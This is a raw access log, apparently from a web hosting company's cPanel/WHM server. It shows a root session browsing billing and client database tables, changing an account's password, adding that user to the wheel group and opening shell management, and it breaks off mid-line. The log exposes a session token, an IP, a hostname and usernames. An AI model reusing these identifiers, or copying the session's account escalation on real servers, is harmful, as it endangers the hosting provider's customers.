/3rdparty/phpMyAdmin/themes/original/img/bd_empty.png HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/3rdparty/phpMyAdmin/db_structure.php?db=webhostl_billing&token=8ca1ba8833931bc463e18a0da900681e" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:26:35 -0000] "GET /3rdparty/phpMyAdmin/themes/original/img/b_deltbl.png HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/3rdparty/phpMyAdmin/db_structure.php?db=webhostl_billing&token=8ca1ba8833931bc463e18a0da900681e" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:26:35 -0000] "GET /3rdparty/phpMyAdmin/themes/original/img/b_tipp.png HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/3rdparty/phpMyAdmin/db_structure.php?db=webhostl_billing&token=8ca1ba8833931bc463e18a0da900681e" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:26:35 -0000] "GET /3rdparty/phpMyAdmin/themes/original/img/b_select.png HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/3rdparty/phpMyAdmin/db_structure.php?db=webhostl_billing&token=8ca1ba8833931bc463e18a0da900681e" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:26:35 -0000] "GET /3rdparty/phpMyAdmin/themes/original/img/bd_browse.png HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/3rdparty/phpMyAdmin/db_structure.php?db=webhostl_billing&token=8ca1ba8833931bc463e18a0da900681e" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:26:36 -0000] "GET /3rdparty/phpMyAdmin/themes/original/img/bd_select.png HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/3rdparty/phpMyAdmin/db_structure.php?db=webhostl_billing&token=8ca1ba8833931bc463e18a0da900681e" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:26:37 -0000] "GET /3rdparty/phpMyAdmin/tbl_structure.php?db=webhostl_billing&token=8ca1ba8833931bc463e18a0da900681e&table=tbladmins HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/3rdparty/phpMyAdmin/navigation.php?db=webhostl_billing&token=8ca1ba8833931bc463e18a0da900681e" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:26:40 -0000] "GET /3rdparty/phpMyAdmin/phpmyadmin.css.php?token=8ca1ba8833931bc463e18a0da900681e&js_frame=right&nocache=3657783124 HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/3rdparty/phpMyAdmin/tbl_structure.php?db=webhostl_billing&token=8ca1ba8833931bc463e18a0da900681e&table=tbladmins" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:26:41 -0000] "GET /3rdparty/phpMyAdmin/themes/original/img/b_primary.png HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/3rdparty/phpMyAdmin/tbl_structure.php?db=webhostl_billing&token=8ca1ba8833931bc463e18a0da900681e&table=tbladmins" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:26:41 -0000] "GET /3rdparty/phpMyAdmin/themes/original/img/b_unique.png HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/3rdparty/phpMyAdmin/tbl_structure.php?db=webhostl_billing&token=8ca1ba8833931bc463e18a0da900681e&table=tbladmins" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:26:41 -0000] "GET /3rdparty/phpMyAdmin/themes/original/img/b_index.png HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/3rdparty/phpMyAdmin/tbl_structure.php?db=webhostl_billing&token=8ca1ba8833931bc463e18a0da900681e&table=tbladmins" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:26:42 -0000] "GET /3rdparty/phpMyAdmin/themes/original/img/bd_primary.png HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/3rdparty/phpMyAdmin/tbl_structure.php?db=webhostl_billing&token=8ca1ba8833931bc463e18a0da900681e&table=tbladmins" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:26:42 -0000] "GET /3rdparty/phpMyAdmin/sql.php?db=webhostl_billing&table=tbladmins&token=8ca1ba8833931bc463e18a0da900681e&goto=tbl_structure.php&back=tbl_structure.php&pos=0 HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/3rdparty/phpMyAdmin/tbl_structure.php?db=webhostl_billing&token=8ca1ba8833931bc463e18a0da900681e&table=tbladmins" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:26:42 -0000] "GET /3rdparty/phpMyAdmin/themes/original/img/bd_unique.png HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/3rdparty/phpMyAdmin/tbl_structure.php?db=webhostl_billing&token=8ca1ba8833931bc463e18a0da900681e&table=tbladmins" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:26:42 -0000] "GET /3rdparty/phpMyAdmin/themes/original/img/bd_index.png HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/3rdparty/phpMyAdmin/tbl_structure.php?db=webhostl_billing&token=8ca1ba8833931bc463e18a0da900681e&table=tbladmins" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:26:43 -0000] "GET /3rdparty/phpMyAdmin/themes/original/img/b_ftext.png HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/3rdparty/phpMyAdmin/tbl_structure.php?db=webhostl_billing&token=8ca1ba8833931bc463e18a0da900681e&table=tbladmins" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:26:43 -0000] "GET /3rdparty/phpMyAdmin/themes/original/img/b_unique.png HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/3rdparty/phpMyAdmin/tbl_structure.php?db=webhostl_billing&token=8ca1ba8833931bc463e18a0da900681e&table=tbladmins" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:26:43 -0000] "GET /3rdparty/phpMyAdmin/themes/original/img/b_primary.png HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/3rdparty/phpMyAdmin/tbl_structure.php?db=webhostl_billing&token=8ca1ba8833931bc463e18a0da900681e&table=tbladmins" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:26:43 -0000] "GET /3rdparty/phpMyAdmin/themes/original/img/b_index.png HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/3rdparty/phpMyAdmin/tbl_structure.php?db=webhostl_billing&token=8ca1ba8833931bc463e18a0da900681e&table=tbladmins" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:26:46 -0000] "GET /3rdparty/phpMyAdmin/phpmyadmin.css.php?token=8ca1ba8833931bc463e18a0da900681e&js_frame=right&nocache=3657783124 HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/3rdparty/phpMyAdmin/sql.php?db=webhostl_billing&table=tbladmins&token=8ca1ba8833931bc463e18a0da900681e&goto=tbl_structure.php&back=tbl_structure.php&pos=0" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:27:16 -0000] "GET /3rdparty/phpMyAdmin/tbl_structure.php?db=webhostl_billing&token=8ca1ba8833931bc463e18a0da900681e&table=tblclients HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/3rdparty/phpMyAdmin/navigation.php?db=webhostl_billing&token=8ca1ba8833931bc463e18a0da900681e" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:27:19 -0000] "GET /3rdparty/phpMyAdmin/phpmyadmin.css.php?token=8ca1ba8833931bc463e18a0da900681e&js_frame=right&nocache=3657783124 HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/3rdparty/phpMyAdmin/tbl_structure.php?db=webhostl_billing&token=8ca1ba8833931bc463e18a0da900681e&table=tblclients" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:27:22 -0000] "GET /3rdparty/phpMyAdmin/sql.php?db=webhostl_billing&table=tblclients&token=8ca1ba8833931bc463e18a0da900681e&goto=tbl_structure.php&back=tbl_structure.php&pos=0 HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/3rdparty/phpMyAdmin/tbl_structure.php?db=webhostl_billing&token=8ca1ba8833931bc463e18a0da900681e&table=tblclients" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:27:25 -0000] "GET /3rdparty/phpMyAdmin/phpmyadmin.css.php?token=8ca1ba8833931bc463e18a0da900681e&js_frame=right&nocache=3657783124 HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/3rdparty/phpMyAdmin/sql.php?db=webhostl_billing&table=tblclients&token=8ca1ba8833931bc463e18a0da900681e&goto=tbl_structure.php&back=tbl_structure.php&pos=0" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:27:27 -0000] "GET /3rdparty/phpMyAdmin/themes/original/img/error.ico HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/3rdparty/phpMyAdmin/phpmyadmin.css.php?token=8ca1ba8833931bc463e18a0da900681e&js_frame=right&nocache=3657783124" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:27:31 -0000] "GET /3rdparty/phpMyAdmin/themes/original/img/bd_ftext.png HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/3rdparty/phpMyAdmin/sql.php?db=webhostl_billing&table=tblclients&token=8ca1ba8833931bc463e18a0da900681e&goto=tbl_structure.php&back=tbl_structure.php&pos=0" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:27:37 -0000] "GET /xml-api/loadavg? HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:27:43 -0000] "GET /3rdparty/phpMyAdmin/themes/original/img/b_tblanalyse.png? HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/3rdparty/phpMyAdmin/sql.php?db=webhostl_billing&table=tblclients&token=8ca1ba8833931bc463e18a0da900681e&goto=tbl_structure.php&back=tbl_structure.php&pos=0" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:27:46 -0000] "GET /3rdparty/phpMyAdmin/navigation.php?server=1&token=8ca1ba8833931bc463e18a0da900681e&db=webhostl_hosting&table=tblclients&lang=en-utf-8&collation_connection=utf8_unicode_ci HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/3rdparty/phpMyAdmin/index.php?db=webhostl_billing&token=8ca1ba8833931bc463e18a0da900681e" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:27:47 -0000] "GET /3rdparty/phpMyAdmin/db_structure.php?server=1&token=8ca1ba8833931bc463e18a0da900681e&db=webhostl_hosting&table=&lang=en-utf-8&collation_connection=utf8_unicode_ci HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/3rdparty/phpMyAdmin/index.php?db=webhostl_billing&token=8ca1ba8833931bc463e18a0da900681e" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:27:48 -0000] "GET /3rdparty/phpMyAdmin/phpmyadmin.css.php?token=8ca1ba8833931bc463e18a0da900681e&js_frame=left&nocache=3657783124 HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/3rdparty/phpMyAdmin/navigation.php?server=1&token=8ca1ba8833931bc463e18a0da900681e&db=webhostl_hosting&table=tblclients&lang=en-utf-8&collation_connection=utf8_unicode_ci" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:27:51 -0000] "GET /3rdparty/phpMyAdmin/phpmyadmin.css.php?token=8ca1ba8833931bc463e18a0da900681e&js_frame=right&nocache=3657783124 HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/3rdparty/phpMyAdmin/db_structure.php?server=1&token=8ca1ba8833931bc463e18a0da900681e&db=webhostl_hosting&table=&lang=en-utf-8&collation_connection=utf8_unicode_ci" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:27:54 -0000] "GET /3rdparty/phpMyAdmin/tbl_structure.php?db=webhostl_hosting&token=8ca1ba8833931bc463e18a0da900681e&table=whl_users HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/3rdparty/phpMyAdmin/navigation.php?server=1&token=8ca1ba8833931bc463e18a0da900681e&db=webhostl_hosting&table=tblclients&lang=en-utf-8&collation_connection=utf8_unicode_ci" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:27:58 -0000] "GET /3rdparty/phpMyAdmin/phpmyadmin.css.php?token=8ca1ba8833931bc463e18a0da900681e&js_frame=right&nocache=3657783124 HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/3rdparty/phpMyAdmin/tbl_structure.php?db=webhostl_hosting&token=8ca1ba8833931bc463e18a0da900681e&table=whl_users" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:28:02 -0000] "GET /3rdparty/phpMyAdmin/sql.php?db=webhostl_hosting&table=whl_users&token=8ca1ba8833931bc463e18a0da900681e&goto=tbl_structure.php&back=tbl_structure.php&pos=0 HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/3rdparty/phpMyAdmin/tbl_structure.php?db=webhostl_hosting&token=8ca1ba8833931bc463e18a0da900681e&table=whl_users" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:28:05 -0000] "GET /3rdparty/phpMyAdmin/phpmyadmin.css.php?token=8ca1ba8833931bc463e18a0da900681e&js_frame=right&nocache=3657783124 HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/3rdparty/phpMyAdmin/sql.php?db=webhostl_hosting&table=whl_users&token=8ca1ba8833931bc463e18a0da900681e&goto=tbl_structure.php&back=tbl_structure.php&pos=0" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:28:39 -0000] "GET /xml-api/loadavg HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:28:50 -0000] "GET /scripts/modwheel HTTP/1.1" 0 "https://srv01.webhostline.com:2087/scripts/command" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:29:20 -0000] "GET /xml-api/loadavg HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:30:01 -0000] "GET /xml-api/loadavg HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:30:08 -0000] "GET /scripts4/listaccts HTTP/1.1" 0 "https://srv01.webhostline.com:2087/scripts/command" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:30:24 -0000] "GET /xml-api/loadavg HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:30:43 -0000] "GET /scripts/edituser?domain=crownvipservices.com&user=crownvip HTTP/1.1" 0 "https://srv01.webhostline.com:2087/scripts4/listaccts" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:30:46 -0000] "GET /xml-api/loadavg HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:30:52 -0000] "GET /scripts4/listaccts HTTP/1.1" 0 "https://srv01.webhostline.com:2087/scripts/command" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:31:25 -0000] "GET /scripts/editsets HTTP/1.1" 0 "https://srv01.webhostline.com:2087/scripts/command" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:31:28 -0000] "GET /xml-api/loadavg HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:31:48 -0000] "GET /xml-api/loadavg HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:31:51 -0000] "POST /scripts/saveedits HTTP/1.1" 0 "https://srv01.webhostline.com:2087/scripts/editsets" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:32:01 -0000] "GET /scripts4/listaccts HTTP/1.1" 0 "https://srv01.webhostline.com:2087/scripts/command" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:32:10 -0000] "GET /xml-api/loadavg HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:32:11 -0000] "GET /scripts/passwdlist HTTP/1.1" 0 "https://srv01.webhostline.com:2087/scripts/command" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:32:12 -0000] "GET /cPanel_magic_revision_1200442320/passbar/passbar.css HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/passwdlist" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:32:12 -0000] "GET /cPanel_magic_revision_1231994908/passbar/password_strength_optimized.js HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/passwdlist" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:32:13 -0000] "GET /cPanel_magic_revision_1231994899/yui/autocomplete/assets/skins/sam/autocomplete.css HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/passwdlist" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:32:14 -0000] "GET /cPanel_magic_revision_1186549334/js/pkg_hover.js HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/passwdlist" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:32:14 -0000] "GET /cPanel_magic_revision_1231994883/yui/datasource/datasource.js HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/passwdlist" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:32:15 -0000] "GET /cPanel_magic_revision_1231994899/yui/autocomplete/autocomplete.js HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/passwdlist" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:32:18 -0000] "GET /xml-api/accountsummary?user=crownvip HTTP/1.1" 0 "https://srv01.webhostline.com:2087/scripts/passwdlist" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:32:26 -0000] "GET /cPanel_magic_revision_1159323796/yui/container/assets/close12_1.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/cPanel_magic_revision_1231994907/themes/x/style_optimized.css" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:32:29 -0000] "GET /yui/treeview/assets/loading.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/passwdlist" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:32:31 -0000] "GET /scripts/display_package_info?pkg=Basic HTTP/1.1" 0 "https://srv01.webhostline.com:2087/scripts/passwdlist" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:32:32 -0000] "POST /scripts/passwd HTTP/1.1" 0 "https://srv01.webhostline.com:2087/scripts/passwdlist" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:32:52 -0000] "GET /xml-api/loadavg HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:33:13 -0000] "GET /scripts2/securitycenter HTTP/1.1" 0 "https://srv01.webhostline.com:2087/scripts/command" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:33:29 -0000] "GET /scripts/modwheel HTTP/1.1" 0 "https://srv01.webhostline.com:2087/scripts/command" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:33:41 -0000] "GET /scripts/addwheel?compilers=0&user=crownvip HTTP/1.1" 0 "https://srv01.webhostline.com:2087/scripts/modwheel" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:33:53 -0000] "GET /xml-api/loadavg HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:34:35 -0000] "GET /xml-api/loadavg HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:34:39 -0000] "GET /scripts2/manageshells HTTP/1.1" 0 "https://srv01.webhostline.com:2087/scripts/command" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:34:49 -0000] "GET 